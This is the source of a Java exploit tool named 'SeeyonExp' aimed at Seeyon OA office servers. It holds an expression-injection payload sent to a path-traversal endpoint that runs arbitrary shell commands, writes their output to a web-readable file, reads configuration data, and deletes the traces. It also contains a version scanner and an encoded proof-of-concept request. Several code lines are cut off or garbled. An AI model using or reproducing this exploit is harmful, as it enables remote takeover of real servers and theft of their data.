16 | String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + winReadDadaConf + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + linReadDadaConf + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();System.out.println(sbStr);sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i=0){
16 | byteOut.write(buffer,0,n);
17 | }
18 | return byteOut.toString();
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/java/Encoder.java:
--------------------------------------------------------------------------------
1 | import java.io.ByteArrayOutputStream;
2 | import java.io.IOException;
3 | import java.net.URLEncoder;
4 | import java.util.zip.GZIPOutputStream;
5 |
6 | public class Encoder {
7 |
8 | public String Encoder(String encodeStr) throws IOException {
9 | ByteArrayOutputStream byteOut = new ByteArrayOutputStream();
10 | GZIPOutputStream gzipOut = new GZIPOutputStream(byteOut);
11 | gzipOut.write(encodeStr.getBytes("UTF-8"));
12 | gzipOut.close();
13 | gzipOut.flush();
14 | String gzipEnStr = byteOut.toString("iso-8859-1");
15 | return URLEncoder.encode(gzipEnStr,"UTF-8");
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/java/ExecuteCode.java:
--------------------------------------------------------------------------------
1 | import java.util.UUID;
2 |
3 | public class ExecuteCode {
4 | public void ExecuteCode(String oaUrl,String cmd) throws Exception {
5 | HTTPClient httpClient = new HTTPClient();
6 | UUID uuid = UUID.randomUUID();
7 | String uuidStr = uuid.toString();
8 | uuidStr = uuidStr.replace("-", "");
9 | String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip";
10 | String getUrl = oaUrl + "/" + uuidStr + ".txt";
11 | String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt";
12 | String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt";
13 | String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt";
14 | //执行命令
15 | String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + cmd + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + cmd + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i versionsList = versions.toList();
26 | List versionList1 = new ArrayList<>();
27 | for (Object version:versionsList) {
28 | versionList1.add((String)version);
29 | }
30 | if (url.startsWith("http:")){
31 | HttpClient client = new DefaultHttpClient();
32 | HttpGet request = new HttpGet(url);
33 | HttpResponse response = client.execute(request);
34 | String result = EntityUtils.toString(response.getEntity());
35 | if (result != null){
36 | Integer indexVersionFlag = result.lastIndexOf("all-min.css");
37 | String version = result.substring(indexVersionFlag,indexVersionFlag+21);
38 | String[] versionArr = version.split("=");
39 | version = versionArr[1];
40 | version = version.replace("_",".").toLowerCase();
41 | for (String versionString : versionList1) {
42 | if (version.startsWith(versionString.toLowerCase())){
43 | System.out.println("[*]命中影响版本,开始扫描");
44 | String attackUrl="";
45 | for (Object atturl:attUrl) {
46 | attackUrl = url + atturl;
47 | }
48 | Scanner scanner = new Scanner();
49 | System.out.println(scanner.Scanner(poc,attackUrl,method,res));
50 | }
51 | continue;
52 | }
53 | }else {
54 | System.out.println("[!]网页无内容,请检查后重新运行");
55 | }
56 | }else {
57 | CloseableHttpClient client;
58 | URIBuilder uriBuilder = new URIBuilder(url);
59 | int port = uriBuilder.getPort();
60 | if (port != 443){
61 | client = new SSLClient(uriBuilder.getPort());
62 | }else {
63 | client = new SSLClient(443);
64 | }
65 | HttpGet httpGet = new HttpGet(uriBuilder.build());
66 | CloseableHttpResponse response = client.execute(httpGet);
67 | String result = EntityUtils.toString(response.getEntity());
68 | if (result != null) {
69 | Integer indexVersionFlag = result.lastIndexOf("all-min.css");
70 | String version = result.substring(indexVersionFlag,indexVersionFlag+21);
71 | String[] versionArr = version.split("=");
72 | version = versionArr[1];
73 | version = version.replace("_",".").toLowerCase();
74 | for (String versionString : versionList1) {
75 | if (version.startsWith(versionString.toLowerCase())){
76 | System.out.println("[*]命中影响版本,开始扫描");
77 | String attackUrl="";
78 | for (Object atturl:attUrl) {
79 | attackUrl = url + atturl;
80 | }
81 | Scanner scanner = new Scanner();
82 | System.out.println(scanner.Scanner(poc,attackUrl,method,res));
83 | }
84 | continue;
85 | }
86 | }else {
87 | System.out.println("[!]网页无内容,请检查后重新运行");
88 | }
89 | }
90 | }
91 | }
92 |
--------------------------------------------------------------------------------
/SeeyonExp/vul.json:
--------------------------------------------------------------------------------
1 | {
2 | "Vulnerabilities":
3 | [
4 | {
5 | "name": "Seeyon Expression injection",
6 | "ImpactVersion": ["V7.0","V7.1","V8.0","V6.1"],
7 | "url": ["/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"],
8 | "pocMethod": "POST",
9 | "pocContent": "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%C2%8B%C2%AEVO%C3%8B%2F%C3%8A-%C3%8DI%0C%C2%A9%2CHU%C2%B7R0%C3%94Q%C2%80%C2%89%C3%B8%25%C3%A6%C2%82D%C3%94KR%C2%8BK%C3%94%11%C3%82%C2%AE%15%05E%C2%A9%C3%85%C3%85%C2%99%C3%B9y+%C3%89%C3%A0%C2%92%C2%A2%C3%8C%C2%BCt%C2%85%C2%82%C3%84%C2%92%0C%05%5B%05%25C%25%C3%ABZk%C2%90%06%0DM%C3%AB%C2%94%C3%944%C2%85%C3%A2%C2%92%C3%84%C2%92%C3%8Cd%C2%85%C2%8A%C2%8A%0A%0D%C3%8Dj%C3%B5Z%C2%A0%29%40%C2%93%C2%AAAtIQi%C2%AAz%2C%00l%C3%BA%C2%92%C3%AC%C2%80%00%00%00",
10 | "verify": "string",
11 | "Response": "\"message\":null",
12 | }
13 | ]
14 | }
15 |
--------------------------------------------------------------------------------